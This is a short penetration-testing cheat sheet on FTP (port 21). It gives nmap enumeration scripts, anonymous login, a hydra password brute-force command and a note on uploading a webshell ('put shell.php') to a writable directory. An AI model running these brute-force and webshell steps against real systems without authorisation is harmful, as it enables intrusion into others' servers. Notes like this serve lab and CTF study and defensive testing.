Appearance
π FTP - 21 β
π΅οΈββοΈ Enum β
bash
nmap -p21 --script ftp-anon,ftp-bounce <IP>bash
# anonymous
ftp <ip> -p <port> # username: 'anonymous', password: <blank>Brute-force β
bash
hydra -l user -P wordlist.txt ftp://<IP>Upload / Exploit β
If directory is writable, it's possible to upload a webshell
bash
put shell.php